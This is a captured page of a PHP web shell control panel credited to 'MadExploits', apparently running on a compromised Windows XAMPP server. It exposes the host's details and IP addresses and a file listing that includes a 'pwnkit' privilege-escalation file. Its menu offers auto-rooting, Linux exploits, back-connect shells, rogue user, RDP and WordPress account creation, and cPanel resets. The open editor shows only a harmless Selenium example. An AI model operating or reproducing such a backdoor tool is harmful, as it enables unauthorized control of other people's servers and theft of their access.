Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.134
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
CompatInfo
[ DIR ]
drwxrwxrwx
cfg
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
dev
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
ext
[ DIR ]
drwxrwxrwx
extras
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
man
[ DIR ]
drwxrwxrwx
pear
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
windowsXamppPhp
[ DIR ]
drwxrwxrwx
www
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CompatInfo.php
18.43
KB
-rw-rw-rw-
README.md
5.09
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
deplister.exe
134.5
KB
-rwxrwxrwx
glib-2.dll
1.54
MB
-rw-rw-rw-
gmodule-2.dll
18.5
KB
-rw-rw-rw-
icudt71.dll
29.01
MB
-rw-rw-rw-
icuin71.dll
2.89
MB
-rw-rw-rw-
icuio71.dll
59.5
KB
-rw-rw-rw-
icuuc71.dll
2.15
MB
-rw-rw-rw-
libcrypto-3-x64.dll
4.96
MB
-rw-rw-rw-
libenchant2.dll
41.5
KB
-rw-rw-rw-
libpq.dll
283
KB
-rw-rw-rw-
libsasl.dll
205
KB
-rw-rw-rw-
libsodium.dll
296.5
KB
-rw-rw-rw-
libsqlite3.dll
1.57
MB
-rw-rw-rw-
libssh2.dll
372
KB
-rw-rw-rw-
libssl-3-x64.dll
760
KB
-rw-rw-rw-
license.txt
3.2
KB
-rw-rw-rw-
news.txt
48.6
KB
-rw-rw-rw-
nghttp2.dll
226
KB
-rw-rw-rw-
pci
527
B
-rw-rw-rw-
pci.bat
568
B
-rwxrwxrwx
pci.css
1.23
KB
-rw-rw-rw-
pciconf
17.1
KB
-rw-rw-rw-
pciconf.bat
561
B
-rwxrwxrwx
pear.bat
4.26
KB
-rwxrwxrwx
peardev.bat
4.61
KB
-rwxrwxrwx
pecl.bat
4.55
KB
-rwxrwxrwx
phar.phar.bat
43
B
-rwxrwxrwx
pharcommand.phar
64.42
KB
-rw-rw-rw-
php-cgi.exe
67.5
KB
-rwxrwxrwx
php-win.exe
37.5
KB
-rwxrwxrwx
php.exe
139
KB
-rwxrwxrwx
php.ini
75.03
KB
-rw-rw-rw-
php.ini-development
73.92
KB
-rw-rw-rw-
php.ini-production
74.07
KB
-rw-rw-rw-
php8apache2_4.dll
35
KB
-rw-rw-rw-
php8embed.lib
912.23
KB
-rw-rw-rw-
php8phpdbg.dll
271
KB
-rw-rw-rw-
php8ts.dll
8.65
MB
-rw-rw-rw-
phpdbg.exe
273
KB
-rwxrwxrwx
phpunit
2.05
KB
-rw-rw-rw-
phpunit.bat
1.91
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rw-rw-rw-
readme-redist-bins.txt
30.16
KB
-rw-rw-rw-
snapshot.txt
2.23
KB
-rw-rw-rw-
webdriver-test-example.php
1.41
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webdriver-test-example.php
<?php /* Copyright 2011 3e software house & interactive agency Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // XAMPP NOTE: First please download Selenium RC (*.jar) from here : http://seleniumhq.org/download/ // XAMPP NOTE: Start the Selenium RC Server via cmd with: java -jar selenium-server-standalone-2.25.0.jar // XAMPP NOTE: Then start this script with the cmd from here: .\php.exe -f webdriver-test-example.php // XAMPP NOTE: This example uses php-webdriver-bindings-0.9.0 (see the folder xampp\pear\phpwebdriver) require_once "phpwebdriver/WebDriver.php"; require_once("phpwebdriver/LocatorStrategy.php"); $webdriver = new WebDriver("localhost", "4444"); $webdriver->connect("firefox"); $webdriver->get("http://google.com"); $element = $webdriver->findElementBy(LocatorStrategy::name, "q"); $element->sendKeys(array("selenium google code" ) ); $element->submit(); $webdriver->close(); ?>
Close